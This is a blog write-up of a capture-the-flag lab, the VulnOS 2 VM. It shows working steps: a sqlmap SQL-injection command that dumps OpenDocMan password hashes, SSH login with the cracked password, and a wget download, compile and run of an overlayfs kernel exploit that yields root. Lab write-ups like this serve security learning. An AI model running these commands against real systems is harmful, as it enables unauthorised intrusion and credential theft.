This is my solution to the Vuln OS 2 challenge by c4b3rw0lf.
Let’s get started:
We were not provided with any logon credentials for the VM so I could not simply login to check the IP address of the target machine (unless I cheated by altering grub). So, the first step was finding the IP address.
root@kali:~# netdiscover -i eth0 -r 10.0.2.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 60
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
10.0.2.7 08:00:27:43:dc:89 01 060 CADMUS COMPUTER SYSTEMS
I know that my Kali machine and the target VM are the only machines on the virtual network, so that has to be it. Now that I know the IP of my target, I can perform some more recon using NMAP.
root@kali:~# nmap -n -sT -A -T4 10.0.2.7
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-05-25 11:20 CDT
Nmap scan report for 10.0.2.7
Host is up (0.00060s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:43:DC:89 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looks like we have SSH, a webserver running, and an IRC server. Let’s checkout the webserver first.
Initially, I tried to enumerate some common directories using dirb but nothing of interest came up. Upon accessing the website, we are given some instructions and a link to /jabc
### Pentest the company website on the server... Get root of the system and read the final flag ###
Following the link, we are presented with a new webpage with a lot more options. It took me longer than I would like to admit but I finally found something interesting at /jabc/?q=node/7.
It looks like a blank page but a ctrl+a highlights the hidden text and we are given yet another message and a link to follow.
Dear customer,
For security reasons, this section is hidden.
For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest
Thank you.
Navigating to /jabcd0cs/ presents us a login panel. We were given the credentials of guest/guest in the hidden message so let’s use those. Once logged in, I noticed you could upload files at /jabcd0cs/add.php. I poked around trying to exploit what I thought would be an Unrestricted File Upload vulnerability, but it got me nowhere.
I eventually noticed that the website was powered by OpenDocMan version 1.2.7. A quick google search led me here
OpenDocMan 1.2.7 Multiple Vulnerabilities
https://www.exploit-db.com/exploits/32075/
Reading over the report, I discover that this version of OpenDocMan has a SQL Injection vulnerability! The “add_value” parameter of “/ajax_udf.php” is not properly sanitized. I fired up SQLMap and managed to steal the hashed password of the admin (ignore the admins@admin[.]com. that was me registering an account).
sqlmap -u "http://10.0.2.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C Email,password,username --dump
Database: jabcd0cs
Table: odm_user
[3 entries]
+--------------------+----------------------------------+----------+
| Email | password | username |
+--------------------+----------------------------------+----------+
| [email protected] | b78aae356709f8c31118ea613980954b | webmin |
| [email protected] | 084e0343a0486ff05530df6c705c8bb4 | guest |
| [email protected] | 286755fad04869ca523320acce0dc6a4 |[redacted]|
+--------------------+----------------------------------+----------+
Using SQLMap, I also discovered that the MySQL database was running as root 
After cracking the webmin hash, I discover that the password is webmin1980. Remember we found that SSH was running? Let’s see if we can reuse credentials:
root@kali:~# ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Wed May 25 17:37:20 CEST 2016
System load: 0.0 Processes: 87
Usage of /: 5.8% of 29.91GB Users logged in: 0
Memory usage: 14% IP address for eth0: 10.0.2.7
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Wed May 25 17:37:20 2016 from 10.0.2.3
$ bash
webmin@VulnOSv2:~$
We can! After doing a bit of recon on the box, I didn’t find anything worth while. However, this machine is running a vulnerable version of Ubuntu:
webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
Let’s go back to Kali and see what we can find:
root@kali:~# searchsploit Ubuntu 14
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
Ubuntu PAM MOTD File Tampering (Privilege Es | ./linux/local/14273.sh
Ubuntu PAM 1.1.0 MOTD - Local Root Exploit | ./linux/local/14339.sh
Ubuntu 10.04 LTS - Lucid Lynx ftp Client 0.1 | ./linux/dos/14452.txt
Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayf | ./linux/local/37292.c
Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayf | ./linux/local/37293.txt
--------------------------------------------- ----------------------------------
Looks like we may have found a local root exploit for Ubuntu 14.04, let’s check it out:
root@kali:/usr/share/exploitdb/platforms/linux/local# cat 37293.txt
The overlayfs filesystem does not correctly check file permissions when
creating new files in the upper filesystem directory. This can be exploited
by an unprivileged process in kernels with CONFIG_USER_NS=y and where
overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs
inside unprivileged mount namespaces. This is the default configuration of
Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].
Hm, our target is running Ubuntu 14.04 and is more than likely unpatched. Let’s get the exploit on the target machine, compile it, and run it:
root@kali:~# service apache2 start
root@kali:~# cp /usr/share/exploitdb/platforms/linux/local/37292.c /var/www/html/
Here, I started up my own webserver and copied the exploit into my document root. This way, I can use wget and download the file from the target machine.
webmin@VulnOSv2:~$ wget http://10.0.2.3/37292.c
--2016-05-25 18:54:05-- http://10.0.2.3/37292.c
Connecting to 10.0.2.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/x-csrc]
Saving to: ‘37292.c’
100%[======================================>] 5,123 --.-K/s in 0s
2016-05-25 18:54:05 (298 MB/s) - ‘37292.c’ saved [5123/5123]
Got it! Let’s compile it and cross our fingers:
webmin@VulnOSv2:~$ gcc 37292.c
webmin@VulnOSv2:~$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
We completed the challenge! I had quite a bit of fun with this one, wasn’t too difficult. I definitely could have saved myself some time if I had done more recon from the start. I recommend this to anyone looking to get started in boot2root challeneges.
SOURCE:
My Blog
Proof that it’s my blog